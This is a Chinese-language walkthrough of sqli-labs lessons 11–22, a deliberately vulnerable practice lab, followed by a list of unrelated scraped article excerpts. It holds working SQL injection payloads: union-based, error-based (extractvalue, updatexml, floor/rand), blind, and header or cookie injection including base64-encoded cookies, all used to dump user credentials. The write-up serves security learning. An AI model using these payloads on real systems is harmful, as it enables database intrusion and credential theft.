目标是技术宅

sqli-labs Basic Challenges Less11-22

总结：

Less11-12 Union select

Less13-14 报错注入

Less15-16 盲注

Less17 Update报错注入

Less18-20 抓包修改字段

Less21-22 抓包修改字段+Base64加密

详细：

Less-11 POST-Error Based-Single quotes-String

admin admin //猜想一个用户的名字和密码，成功
admin'-- - //成功
admin' union select 1,2-- - //成功，一共有2列
' union select 1,2-- -	//2列都可以显示
' union select 1,database()-- -	//得到数据库名security
' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()-- -
//得到表名emails,referers,uagents,users
' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'-- -
//得到列名id,username,password
' union select 1,group_concat('id',' ',username,' ',password) from users-- -
//得到所有数据

Less-12 POST-Error Based-Double quotes-String-with twist

admin admin //success
admin'-- - //false
admin"-- - //false, SQL syntax错误
admin")-- -	//success
//中间省略
") union select 1,group_concat('id',' ',username,' ',password) from users-- -
//得到所有数据

Less-13 Double Injection-Single quotes-String-with twist

admin admin //success，但是没有正确的具体信息
admin'-- - //失败，有失败的具体信息
admin')-- - //success

报错注入方法1：

admin') and extractvalue('anything',concat('~',database()))-- - 
//返回错误信息XPATH syntax error: '~security'
admin') and extractvalue('anything',concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())))-- - 
//返回错误信息XPATH syntax error: '~emails,referers,uagents,users'
admin') and extractvalue('anything',concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')))-- -
//返回错误信息XPATH syntax error: '~id,username,password'
admin') and extractvalue('anything',concat('~',(select group_concat(id,' ',username,' ',password) from users)))-- -
//返回错误信息XPATH syntax error: '~1 Dumb Dumb,2 Angelina I-kill-y'

报错注入方法2：

admin') and updatexml('anything',concat('~',(select group_concat(id,' ',username,' ',password) from users)),'anything')-- -

报错注入方法3：

') union select count(*),concat(database(),floor(rand(14)*2)) as c from information_schema.tables group by c-- -
//得到报错Duplicate entry 'security0' for key 'group_key'
') union select count(*),concat(substring((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,100),floor(rand(14)*2)) as c from information_schema.tables group by c-- -
//得到报错Duplicate entry 'emails,referers,uagents,users0' for key 'group_key'
') union select count(*),concat(substring((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,100),floor(rand(14)*2)) as c from information_schema.tables group by c-- -
//得到报错Duplicate entry 'id,username,password0' for key 'group_key'
') union select count(*),concat(substring((select group_concat(id,' ',username,' ',password) from users),1,100),floor(rand(14)*2)) as c from information_schema.tables group by c-- -

Less-14 POST-Double Injection-Single quotes-String-with twist

虽然题目写的是Single quotes，但其实是Double quotes。

把上题中的')换成"即可。

Less-15 POST-Blind-Boolian/time Based-Single quotes

页面能够返回成功或失败，但是不能返回具体信息。

admin'-- -
admin' and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=1-- -
admin' and (select length(group_concat(table_name)) from information_schema.tables where table_schema=database())=1-- -
//这两种都可以

使用burp suite进行盲注，可以得到表的名称总长度为29。

admin' and (select substring(group_concat(table_name),1,1) from information_schema.tables where table_schema=database())='a'-- -

不断测试得到表名，之后得到列名和数据内容。

Less-16 类似

Less-17 POST-Update Query-Error Based-String

一上来是一个重设密码的界面。

update语句的结构是：update 表名 set 列名=值 where 列名=值

在这个题目中应该类似于update 表名 set password=值 where username=值

admin admin //成功
admin' admin //正常报错
admin" admin // 正常报错

做到这里我觉得很奇怪，于是去看了源码，发现源码中对username的输入，用mysqli_real_escape_string函数进行了处理，所以此处无法注入成功。

而且源码中是先确认username存在，再对其密码进行更新的。所以username这里必须填写一个已有的用户名。

admin admin' //成功，但是报错在'admin"附近的索引出现问题

因为可以看到报错，所以考虑利用报错注入。用户名始终输入admin，密码测试如下：

admin' and extractvalue('anything',concat('~',database()))-- -
//得到报错XPATH syntax error: '~security'，接下来爆表
admin' and extractvalue('anything',concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())))-- -
//XPATH syntax error: '~emails,referers,uagents,users'，接下来爆列
admin' and extractvalue('anything',concat('~',(select group_concat(column_name) from information_schema.columns where table_name='users')))-- -
//XPATH syntax error: '~id,username,password'，接下来爆字段
admin' and extractvalue('anything',concat('~',(select group_concat(id,' ',username,' ',password) from users)))-- -

但是得到报错：You can’t specify target table ‘users’ for update in FROM clause

大概意思是，在同一语句中，不能先select表中的一些内容，再update同一张表。

尝试加一层中间表：

admin' and extractvalue('anything',concat('~',(select group_concat(t.id,' ',t.username,' ',t.password) from (select id,username,password from users)t)))-- -

成功得到：XPATH syntax error: '~1 Dumb Dumb,2 Angelina I-kill-y'

下一步是接着读取被截断的字节：

admin' and extractvalue('anything',concat('~',substring((select group_concat(t.id,' ',t.username,' ',t.password) from (select id,username,password from users)t),32,32)))-- -

然后把中间的32换成64，就可以接着读取了。

Less-18 POST-Header Injection-Uagent field-Error based

观察源码，发现username和password都被过滤，但是存在user agent和IP两个注入点:

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";

这里选择对uagent的值进行魔改~

设置好浏览器的代理，用burpsuite进行抓包，在User-Agent一栏中填写

' extractvalue('anything',concat('~',database())) and '

然后点击Forward：

就可以看到浏览器的输出：

接下来先爆表，再爆列，最后爆数据，语法和上一节类似：

' and extractvalue('anything',concat('~',(select group_concat(id,' ',username,' ',password) from users))) and '

可以成功得到前32字节的输出~

Less-19 POST-Header Injection-Referer field-Error based

和上一题类似，只不过本题是对Referer字段进行注入。

在burpsuite的Referer字段输入：

' and extractvalue('anything',concat('~',database())) and '

点击Forward后，成功得到报错：XPATH syntax error: '~security'

接下来分别爆表、爆列、爆数据：

1.爆表
' and extractvalue('anything',concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and '
//得到XPATH syntax error: '~emails,referers,uagents,users'
2.爆列
' and extractvalue('anything',concat('~',(select group_concat(column_name) from information_schema.columns where table_name='users'))) and '
//得到XPATH syntax error: '~id,username,password'
3.爆字段
' and extractvalue('anything',concat('~',substring((select group_concat(id,' ',username,' ',password) from users),1,32))) and '
//得到XPATH syntax error: '~1 Dumb Dumb,2 Angelina I-kill-y'
//修改1为32、64等，得到后续字段

Less-20 POST-Cookie Injection-Uagent field-Error based

用burpsuite抓包，修改cookie字段。

uname=admin' and extractvalue('anything',concat('~',database())) and '

得到报错：

Issue with your mysql: XPATH syntax error: '~security'

和上一题步骤与语法都类似。

直接最后爆数据库字段：

uname=admin' and extractvalue('anything',concat('~',substring((select group_concat(id,' ',username,' ',password) from users),1,32))) and '
//得到报错Issue with your mysql: XPATH syntax error: '~1 Dumb Dumb,2 Angelina I-kill-y'

Less-21 Cookie Injection-base64 encoded-single quotes and parenthesis

观察源码，可以看到cookie的值经过base64解密后进行查询，查询语句中有单引号和圆括号：

$cookee = base64_decode($cookee);
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";

所以构建新的cookie注入内容，将下面语句进行base64加密：

uname=admin')and extractvalue('anything',concat('~',database()))-- -

得到：

uname=YWRtaW4nKWFuZCBleHRyYWN0dmFsdWUoJ2FueXRoaW5nJyxjb25jYXQoJ34nLGRhdGFiYXNlKCkpKS0tIC0=

然后用burpsuite在Cookie处进行注入，得到报错：Issue with your mysql: XPATH syntax error: ‘~security’。

但是非常迷的一点是，如果在构造时，在admin')和and之间加入空格，则会失败：

//加上空格后：
uname=admin') and extractvalue('anything',concat('~',database()))-- -
//base64编码：
uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKCdhbnl0aGluZycsY29uY2F0KCd+JyxkYXRhYmFzZSgpKSktLSAt
//得到报错：
check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 0,1' at line 1

不知道是Base64算法的实现有问题还是怎样。

接下来还是爆表，爆列，爆字段，这里只写一下爆字段的：

uname=admin')and extractvalue('anything',concat('~',substring((select group_concat(id,' ',username,' ',password) from users),1,32)))-- -
//加密后
uname=YWRtaW4nKWFuZCBleHRyYWN0dmFsdWUoJ2FueXRoaW5nJyxjb25jYXQoJ34nLHN1YnN0cmluZygoc2VsZWN0IGdyb3VwX2NvbmNhdChpZCwnICcsdXNlcm5hbWUsJyAnLHBhc3N3b3JkKSBmcm9tIHVzZXJzKSwxLDMyKSkpLS0gLQ==
//成功得到报错Issue with your mysql: XPATH syntax error: '~1 Dumb Dumb,2 Angelina I-kill-y'

Less-22 Cookie Injection-base64 encoded-double quotes

如果不考虑题目中给的提示，自己慢慢对cookie尝试注入：

1.admin' YWRtaW4n
//Issue with your mysql: Illegal mix of collations (gbk_chinese_ci,IMPLICIT) and (latin1_swedish_ci,COERCIBLE) for operation '='
2.admin" YWRtaW4i
//check the manual that corresponds to your MySQL server version for the right syntax to use near '"admin"" LIMIT 0,1' at line 1
//看来是双引号没错了
3.//尝试注掉后面的双引号
admin"-- - YWRtaW4iLS0gLQ==
//返回正常，说明注入成功
4.//用报错注入查看数据库
admin" and extractvalue('anything',concat('~',database()))-- -
YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoJ2FueXRoaW5nJyxjb25jYXQoJ34nLGRhdGFiYXNlKCkpKS0tIC0=
//成功得到报错Issue with your mysql: XPATH syntax error: '~security'
5.//查看所有的表名,select部分记得加括号
admin" and extractvalue('anything',concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())))-- -
YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoJ2FueXRoaW5nJyxjb25jYXQoJ34nLChzZWxlY3QgZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSkpKS0tIC0=
//得到XPATH syntax error: '~emails,referers,uagents,users'
6.//查看所有的列名
admin" and extractvalue('anything',concat('~',(select group_concat(column_name) from information_schema.columns where table_name='users')))-- -
YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoJ2FueXRoaW5nJyxjb25jYXQoJ34nLChzZWxlY3QgZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX25hbWU9J3VzZXJzJykpKS0tIC0=
//得到 XPATH syntax error: '~id,username,password'
7.//查看前32位数据
admin" and extractvalue('anything',concat('~',substring((select group_concat(id,' ',username,' ',password) from users),1,32)))-- -
YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoJ2FueXRoaW5nJyxjb25jYXQoJ34nLHN1YnN0cmluZygoc2VsZWN0IGdyb3VwX2NvbmNhdChpZCwnICcsdXNlcm5hbWUsJyAnLHBhc3N3b3JkKSBmcm9tIHVzZXJzKSwxLDMyKSkpLS0gLQ==
//成功得到报错XPATH syntax error: '~1 Dumb Dumb,2 Angelina I-kill-y'

ARM驱动学习之4小结 JT灬新一嵌入式 C++arm开发学习 linux
ARM驱动学习之4小结#include#include#include#include#include#defineDEVICE_NAME"hello_ctl123"MODULE_LICENSE("DualBSD/GPL");MODULE_AUTHOR("TOPEET");staticlonghello_ioctl(structfile*file,unsignedintcmd,unsignedlo
react-intl——react国际化使用方案苹果酱0567 面试题汇总与解析 java 开发语言中间件 spring boot 后端
国际化介绍i18n：internationalization国家化简称，首字母+首尾字母间隔的字母个数+尾字母，类似的还有k8s(Kubernetes)React-intl是React中最受欢迎的库。使用步骤安装#usenpmnpminstallreact-intl-D#useyarn项目入口文件配置//index.tsximportReactfrom"react";importReactDOMf
Linux CTF逆向入门蚁景网络安全 linux 运维 CTF
1.ELF格式我们先来看看ELF文件头，如果想详细了解，可以查看ELF的manpage文档。关于ELF更详细的说明：e_shoff：节头表的文件偏移量（字节）。如果文件没有节头表，则此成员值为零。sh_offset：表示了该section（节）离开文件头部位置的距离+-------------------+|ELFheader|---++--------->+-------------------
Windows安装ciphey编码工具，附一道ciscn编码题例 im-Miclelson CTF工具网络安全
TA是什么一款智能化的编码分析解码工具，对于CTF中复杂性编码类题目可以快速攻破。编码自动分析解码的神器。如何安装Windows环境Python3.864位（最新的版本不兼容，32位的也不行）PIP直接安装pipinstallciphey-ihttps://pypi.mirrors.ustc.edu.cn/simple/安装后若是出现报错请根据错误代码行数找到对应文件，r修改成rb即可。使用标准语
2005年高考英语北京卷 - 阅读理解C 让文字更美
Howcouldwepossiblythinkthatkeepinganimalsincagesinunnaturalenvironments-mostlyforentertainmentpurposes-isfairandrespectful?我们怎么可能认为把动物关在非自然环境的笼子里——主要是为了娱乐目的——是公平和尊重的呢？Zooofficialssaytheyareconcernedab
CTF-bugku-crypto-[7+1+0]-base64解码之后做偏移沧海一粟日尽其用算法安全 python
CTF-bugku-crypto-[7+1+0]-base64解码之后做偏移1.题目2.解题思路2.1base64编码原理2.2解题思路2.2.1base64解码找规律2.2.2破解思路3.解题脚本4.flag5.附EASCII码表1.题目提示信息：7+1+0？格式bugku{xxxxx}密文：4nXna/V7t2LpdLI44mn0fQ==要求：破解密文获得flag2.解题思路2.1base64
CTF常见编码及加解密（超全）第二篇不会代码的小徐编码密码网络安全密码学预编码
HTML实体编码简述：字符实体是用一个编号写入HTML代码中来代替一个字符，在使用浏览器访问网页时会将这个编号解析还原为字符以供阅读。举例：highlighter-HTML明文：hello，world.十进制：hello，world.十六进制：hel
CTF——web方向学习攻略一则孤庸 CTF 网络安全 CTF
1计算机基础操作系统：熟悉Linux命令，方便使用Kali。网络技术：HCNA、CCNA。编程能力：拔高项，有更好。2web应用HTTP协议：必须掌握web开发框架web安全测试3数据库数据库基本操作SQL语句数据库优化4刷题
CTF——web总结 oliveira-time ctf web安全
解题思路做题先看源码关注可下载的资源(zip压缩包)抓包寻找可能存在的加密信息（base64）不管三七二十一先扫描目录再说ps：正常的应该是先扫描目录，然后发现后台进行爆破，发现爆破困难，然后去社工找其他信息。CTF——web个人总结_ctfweb-CSDN博客
VueTreeselect el-tree-select 多选小小并不小 Vue element js vue.js javascript
1、VueTreeselect是一个多选组件npminstall--save@riophae/vue-treeselect全部代码//importthecomponentimportTreeselectfrom'@riophae/vue-treeselect'//importthestylesimport'@riophae/vue-treeselect/dist/vue-treeselect.cs
ctf逆向解题——Bomb二进制炸弹 Funkypantss
BombPhase1在输入阶段将由文件输入的字符存储在input中，在phase1，该阶段将原字符串存储到rdi中，调用pases_1函数进行字符串比较。image进入phase1函数，该函数将原字符串rdi与预先设定的字符串“BorderrelationswithCanadahaveneverbeenbetter.”（存储在rsi中）进行比较，用于比较的函数是strings_not_equal，
【CTF】MISC常用工具集锦/使用方法简介不会代码的小徐 misc 网络安全测试工具
前言#MISC题型多变而且工具繁杂，因此自己花时间整理了一份工具列表，以便日后参考用流畅地阅读这篇博客，你可能需要：Python2.7.18+Python3.8+任何一个更高版本的Python，使用conda管理Linux虚拟机，kali即可流畅访问Google/GitHub等站点的网络通用工具#PuzzleSolver#专为misc手打造的瑞士军刀(?)，整合了多种脚本（base，字频分析，pn
网络安全的相关比赛有哪些？需要掌握哪些必备技能？网安学习 web安全安全网络安全的相关比赛有哪
01、CTF（夺旗赛）这是一种最常见的网络安全竞技形式，要求参赛者在限定时间内解决一系列涉及密码学、逆向工程、漏洞利用、取证分析等领域的挑战，获取标志（flag）并提交得分。通过举办CTF来培养网络安全人才，已经发展成为了国际网络安全圈的共识。CTF赛事可以分为线上赛和线下赛，线上赛通常是解题模式（Jeopardy），线下赛通常是攻防模式（Attack-Defense）。CTF赛事的代表性线下赛事
第四部分：1---文件内核对象，文件描述符，输出重定向 S+叮当猫 Linux CentOS 算法 linux 服务器
目录structfile内核对象：如何读写文件？文件描述符在文件描述符表中的分配规则：输出重定向初步解析：dup2实现复制文件描述符：structfile内核对象：structfile是在内核空间中创建的用于描述文件的结构体，每当一个文件被打开时，内核会为该文件创建一个对应的structfile结构体，并在文件描述符表中为其分配一个文件描述符。基于文件的定义（文件=内容+属性），structfil
网络攻防WEB入门指南 youhao108 网络攻防 web 渗透测试网络安全网络攻防
网络攻防WEB入门指南（大佬绕路）文章目录前言学习网络攻防该如何入门前言我对网络攻防的理解，分为比赛和实战两个部分，两者所学习的知识虽有共通之处，但还是有很大区别，我也在向实战的状态转换，不过二者入门所要掌握的知识差别不大。下面主要从网络攻防竞赛角度，也就是知名的CTF夺旗赛，来谈谈网络攻防知识如何入门。学习网络攻防该如何入门常规CTF比赛主要分为线上做题，以及线下AWD攻防（AttackWith
软考 - 系统架构设计师 - 设计模式小林想被监督学习系统架构设计师系统架构设计模式
目录概念创建型设计模式抽象工厂模式（AbstractFactoryPattern）优点缺点应用场景总结构建器模式（BuilderPattern）优点缺点应用场景工厂方法模式（factorymethod）优点缺点应用场景原型模式（prototype）优点缺点应用场景单例模式（Singleton）优点缺点应用场景结构型设计模式适配器模式（Adapter）优点缺点应用场景桥接模式（Bridge）优点缺点
ctfshow web入门 ssrf web351~web360 kikkeve ctfshow php web安全安全
目录SSRF基础web351web352、353web354web355web356web357web358web359web360SSRF基础SSRF(Server-SideRequestForgery:服务器端请求伪造)就是让服务器去请求服务器的资源，因为我们远程请求不到。curl_init()：初始curl会话curl_setopt()：会话设置curl_exec()：执行curl会话,获取
flutter 一键打出不同包名、应用名、版本名、签名、应用图标、版本号的安装包 Sindyue flutter
1.build.gradle文件中配置不同的应用信息flavorDimensions"app"productFlavors{app1{//配置包名manifestPlaceholders=[str:"releaseStr",package_name:"com.example.demo1"]applicationId"com.example.demo1"versionCode1versionName
CTF 竞赛密码学方向学习路径规划 David Max CTF 学习笔记密码学 ctf 信息安全
目录计算机科学基础计算机科学概念的引入、兴趣的引导开发环境的配置与常用工具的安装WattToolkit（Steam++）、机场代理Scoop（Windows用户可选）常用Python库SageMathLinux小工具yafuOpenSSLMarkdown编程基础Python其他编程语言、算法与数据结构（可选）数学基础离散数学与抽象代数复杂性分析密码学的正式学习兴趣的培养做题小技巧系统学习需要了解并
MySQL8.0新特性~最左前缀匹配原则被打破了进击的CJR mysql mysql
测试在MySQL8.0.25和mysql5.7.33中创建如下CREATETABLEt1(f1INTNOTNULL,f2INTNOTNULL,PRIMARYKEY(f1,f2));INSERTINTOt1VALUES(1,1),(1,2),(1,3),(1,4),(1,5),(2,1),(2,2),(2,3),(2,4),(2,5);INSERTINTOt1SELECTf1,f2+5FROMt1;
hackcon ctf 2018 | pwn wp fantasy_learner
BOF漏洞点:栈溢出利用过程栈溢出跳转callMeMaybe函数获得flagexpSheSellsSeaShells90流程分析:给出了输入的栈地址有一个栈溢出点没有nx利用过程:根据以上三点，得出可以使用ret2shellcode使用shellcraft生成shellcode利用栈溢出，输入并跳转到shellcodeexpSimpleYetElegent150这道题目做了最久，卡在了能否根据_d
BUUCTF 2021-10-4 Pwn Ch1lkat BUUCTF Pwn linux pwn
文章目录保持手感echo分析EXPPwnme1分析EXPwdb_2018_1st_babyheap分析EXPFSOPhouseoforange_hitcon_2016分析前置知识House_of_orangeFSOPEXPzctf_2016_note3分析EXPgyctf_2020_document分析EXP动态调试复现护网杯_gettingstart分析EXPpicoctf_2018_buffe
C# 关于多线程同步不同实现方式語衣 C#知识补充 c#开发语言
栏目总目录AutoResetEventclassMainClass{//thearrayofconsumerthreadsprivatestaticListconsumers=newList();//thetaskqueueprivatestaticQueuetasks=newQueue();//thesynchronisationobjectforlockingthetaskqueuepriva
Android里的设计模式 jim_dayday_up #Android_基础知识设计模式 java 开发语言
一：设计模式分类经典的23种设计模式是由ErichGamma、RichardHelm、RalphJohnson和JohnVlissides（合称“GangofFour”）在他们的书《设计模式：可复用面向对象软件的基础》中定义的。以下是这些设计模式的分类和简要介绍。1.1创建型模式单例模式(Singleton)：确保一个类只有一个实例，并提供一个全局访问点。抽象工厂模式(AbstractFactor
软考——简单记忆设计模式 Yeira 设计模式 python java
抽象工厂模式（AbstractFactory）:提供一个接口，可以创建一系列相关或相互依赖的对象，而无需指定它们具体的类。（一个接口创建相关对象，无需具体的类）构建器模式（Builder）：将一个复杂类的表示与其构造相分离，使得相同的构建过程能够得出不同的表示。（相同是构造，不同的表示）工厂方法模式（FactoryMethod）：定义一个创建对象的接口，但由子类决定需要实例化哪一个类。工厂方法使得
【软考】设计模式之抽象工厂模式王佑辉软考设计模式软考
目录1.说明2.应用场景3.结构图4.构成5.适用性6.优点7.缺点8.java示例1.说明1.提供一个创建一系列相关或相互依赖对象的接口，而无须指定它们具体的类。2.抽象工厂模式（AbstractFactoryPattern）是一种创建型设计模式。3.抽象工厂模式用于系统的产品族，而不仅仅是一个等级结构；一个等级的抽象类只能创建一个等级的产品，而抽象工厂模式能创建多个等级的产品。2.应用场景1.
30、基于SelectFromModel和LassoCV的特征选择凌晨思索
30、基于SelectFromModel和LassoCV的特征选择importmatplotlib.pyplotaspltimportnumpyasnpfromsklearn.datasetsimportload_diabetesfromsklearn.feature_selectionimportSelectFromModelfromsklearn.linear_modelimportLasso
【鸿蒙HarmonyOS开发笔记】使用@Preview装饰器预览组件 Luxine. 鸿蒙HarmonyOS开发笔记前端分享笔记华为 harmonyos
概述ArkTS应用/服务支持组件预览，要求compileSdkVersion为8或以上。组件预览支持实时预览，不支持动态图和动态预览。组件预览通过在组件前添加注解@Preview实现，在单个源文件中，最多可以使用10个@Preview装饰自定义组件。@Preview的使用参考如下示例@Preview({title:'FoodImage'})@ComponentstructFoodImageDisp
vue3+tesseract 图片文字提取妙明元心 javascript vue.js ecmascript
github:https://github.com/naptha/tesseract.js可实现多语言识别，中英文混合识别demo如下：importTesseractfrom"tesseract.js"//方式1：Tesseract.recognize('http://localhost:5173/vue.jpg','eng+chi_sim',).then((d)=>{console.log(d.
iOS M1芯片Mac上Xcode模拟器报错解决 aven_kang
真机编译可以通过，模拟器失败，出现以下错误...,buildingforiOSSimulator,butlinkinginobjectfilebuiltforiOS,file'...'或者couldnotfindmodulefortarget'x86_64-apple-ios-simulator'解决方案一1.添加arm64到项目PEROJECT和TARGETS的ExcludedArchitect
用MiddleGenIDE工具生成hibernate的POJO（根据数据表生成POJO类） AdyZhang POJO eclipse Hibernate MiddleGenIDE
推荐:MiddlegenIDE插件, 是一个Eclipse 插件. 用它可以直接连接到数据库, 根据表按照一定的HIBERNATE规则作出BEAN和对应的XML ，用完后你可以手动删除它加载的JAR包和XML文件! 今天开始试着使用
.9.png Cb123456 android
“点九”是andriod平台的应用软件开发里的一种特殊的图片形式，文件扩展名为：.9.png 　　智能手机中有自动横屏的功能,同一幅界面会在随着手机(或平板电脑)中的方向传感器的参数不同而改变显示的方向,在界面改变方向后,界面上的图形会因为长宽的变化而产生拉伸,造成图形的失真变形。　　我们都知道android平台有多种不同的分辨率，很多控件的切图文件在被放大拉伸后，边
算法的效率天子之骄算法效率复杂度最坏情况运行时间大O阶平均情况运行时间
算法的效率效率是速度和空间消耗的度量。集中考虑程序的速度，也称运行时间或执行时间，用复杂度的阶(O)这一标准来衡量。空间的消耗或需求也可以用大O表示，而且它总是小于或等于时间需求。以下是我的学习笔记： 1.求值与霍纳法则，即为秦九韶公式。 2.测定运行时间的最可靠方法是计数对运行时间有贡献的基本操作的执行次数。运行时间与这个计数成正比。
java数据结构何必如此 java 数据结构
Java 数据结构 Java工具包提供了强大的数据结构。在Java中的数据结构主要包括以下几种接口和类：枚举（Enumeration）位集合（BitSet）向量（Vector）栈（Stack）字典（Dictionary）哈希表（Hashtable）属性（Properties）以上这些类是传统遗留的，在Java2中引入了一种新的框架-集合框架(Collect
MybatisHelloWorld 3213213333332132
//测试入口TestMyBatis package com.base.helloworld.test; import java.io.IOException; import org.apache.ibatis.io.Resources; import org.apache.ibatis.session.SqlSession; import org.apache.ibat
Java|urlrewrite|URL重写|多个参数 7454103 java xml Web 工作
个人工作经验！如有不当之处，敬请指点 1.0 web -info 目录下建立 urlrewrite.xml 文件类似如下： <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE u
达梦数据库+ibatis darkranger sql mysql ibatis SQL Server
--插入数据方面如果您需要数据库自增... 那么在插入的时候不需要指定自增列. 如果想自己指定ID列的值, 那么要设置 set identity_insert 数据库名.模式名.表名; ----然后插入数据; example: create table zhabei.test( id bigint identity(1,1) primary key, nam
XML 解析四种方式 aijuans android
XML现在已经成为一种通用的数据交换格式,平台的无关性使得很多场合都需要用到XML。本文将详细介绍用Java解析XML的四种方法。 XML现在已经成为一种通用的数据交换格式,它的平台无关性,语言无关性,系统无关性,给数据集成与交互带来了极大的方便。对于XML本身的语法知识与技术细节,需要阅读相关的技术文献,这里面包括的内容有DOM(Document Object
spring中配置文件占位符的使用 avords
1.类 <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE beans PUBLIC "-//SPRING//DTD BEAN//EN" "http://www.springframework.o
前端工程化-公共模块的依赖和常用的工作流 bee1314 webpack
题记：一个人的项目，还有工程化的问题嘛？我们在推进模块化和组件化的过程中，肯定会不断的沉淀出我们项目的模块和组件。对于这些沉淀出的模块和组件怎么管理？另外怎么依赖也是个问题？你真的想这样嘛？ var BreadCrumb = require(‘../../../../uikit/breadcrumb’); //真心ugly。
上司说「看你每天准时下班就知道你工作量不饱和」，该如何回应？ bijian1013 项目管理沟通 IT职业规划
问题：上司说「看你每天准时下班就知道你工作量不饱和」，如何回应正常下班时间6点，只要是6点半前下班的，上司都认为没有加班。 Eno-Bea回答，注重感受，不一定是别人的虽然我不知道你具体从事什么工作与职业，但是我大概猜测，你是从事一项不太容易出现阶段性成果的工作
TortoiseSVN，过滤文件征客丶 SVN
环境： TortoiseSVN 1.8 配置：在文件夹空白处右键选择 TortoiseSVN -> Settings 在 Global ignote pattern 中添加要过滤的文件：多类型用英文空格分开 *name ：过滤所有名称为 name 的文件或文件夹 *.name ：过滤所有后缀为 name 的文件或文件夹 --------
【Flume二】HDFS sink细说 bit1129 Flume
1. Flume配置 a1.sources=r1 a1.channels=c1 a1.sinks=k1 ###Flume负责启动44444端口 a1.sources.r1.type=avro a1.sources.r1.bind=0.0.0.0 a1.sources.r1.port=44444 a1.sources.r1.chan
The Eight Myths of Erlang Performance bookjovi erlang
erlang有一篇guide很有意思： http://www.erlang.org/doc/efficiency_guide 里面有个The Eight Myths of Erlang Performance： http://www.erlang.org/doc/efficiency_guide/myths.html Myth: Funs are sl
java多线程网络传输文件(非同步)-2008-08-17 ljy325 java 多线程 socket
利用 Socket 套接字进行面向连接通信的编程。客户端读取本地文件并发送；服务器接收文件并保存到本地文件系统中。使用说明:请将TransferClient, TransferServer, TempFile三个类编译，他们的类包是FileServer. 客户端: 修改TransferClient: serPort, serIP, filePath, blockNum,的值来符合您机器的系
读《研磨设计模式》-代码笔记-模板方法模式 bylijinnan java 设计模式
声明：本文只为方便我个人查阅和理解，详细的分析以及源代码请移步原作者的博客http://chjavach.iteye.com/ import java.sql.Connection; import java.sql.DriverManager; import java.sql.PreparedStatement; import java.sql.ResultSet;
配置心得 chenyu19891124 配置
时间就这样不知不觉的走过了一个春夏秋冬，转眼间来公司已经一年了，感觉时间过的很快，时间老人总是这样不停走，从来没停歇过。作为一名新手的配置管理员，刚开始真的是对配置管理是一点不懂，就只听说咱们公司配置主要是负责升级，而具体该怎么做却一点都不了解。经过老员工的一点点讲解，慢慢的对配置有了初步了解，对自己所在的岗位也慢慢的了解。做了一年的配置管理给自总结下： 1.改变从一个以前对配置毫无
对“带条件选择的并行汇聚路由问题”的再思考 comsci 算法工作软件测试嵌入式领域模型
2008年上半年，我在设计并开发基于”JWFD流程系统“的商业化改进型引擎的时候，由于采用了新的嵌入式公式模块而导致出现“带条件选择的并行汇聚路由问题”(请参考2009-02-27博文)，当时对这个问题的解决办法是采用基于拓扑结构的处理思想，对汇聚点的实际前驱分支节点通过算法预测出来，然后进行处理，简单的说就是找到造成这个汇聚模型的分支起点，对这个起始分支节点实际走的路径数进行计算，然后把这个实际
Oracle 10g 的clusterware 32位下载地址 daizj oracle
Oracle 10g 的clusterware 32位下载地址 http://pan.baidu.com/share/link?shareid=531580&uk=421021908 http://pan.baidu.com/share/link?shareid=137223&uk=321552738 http://pan.baidu.com/share/l
非常好的介绍：Linux定时执行工具cron dongwei_6688 linux
Linux经过十多年的发展，很多用户都很了解Linux了，这里介绍一下Linux下cron的理解，和大家讨论讨论。cron是一个Linux 定时执行工具，可以在无需人工干预的情况下运行作业，本文档不讲cron实现原理，主要讲一下Linux定时执行工具cron的具体使用及简单介绍。新增调度任务推荐使用crontab -e命令添加自定义的任务（编辑的是/var/spool/cron下对应用户的cr
Yii assets目录生成及修改 dcj3sjt126com yii
assets的作用是方便模块化，插件化的，一般来说出于安全原因不允许通过url访问protected下面的文件，但是我们又希望将module单独出来，所以需要使用发布，即将一个目录下的文件复制一份到assets下面方便通过url访问。 assets设置对应的方法位置 \framework\web\CAssetManager.php assets配置方法在m
mac工作软件推荐 dcj3sjt126com mac
mac上的Terminal + bash ＋ screen组合现在已经非常好用了，但是还是经不起iterm＋zsh＋tmux的冲击。在同事的强烈推荐下，趁着升级mac系统的机会，顺便也切换到iterm＋zsh＋tmux的环境下了。我为什么要要iterm2 切换过来也是脑袋一热的冲动，我也调查过一些资料，看了下iterm的一些优点： * 兼容性好，远程服务器 vi 什么的低版本能很好兼
Memcached(三)、封装Memcached和Ehcache frank1234 memcached ehcache spring ioc
本文对Ehcache和Memcached进行了简单的封装，这样对于客户端程序无需了解ehcache和memcached的差异，仅需要配置缓存的Provider类就可以在二者之间进行切换，Provider实现类通过Spring IoC注入。 cache.xml <?xml version="1.0" encoding="UTF-8"?>
Remove Duplicates from Sorted List II hcx2013 remove
Given a sorted linked list, delete all nodes that have duplicate numbers, leaving only distinct numbers from the original list. For example,Given 1->2->3->3->4->4->5,
Spring4新特性——注解、脚本、任务、MVC等其他特性改进 jinnianshilongnian spring4
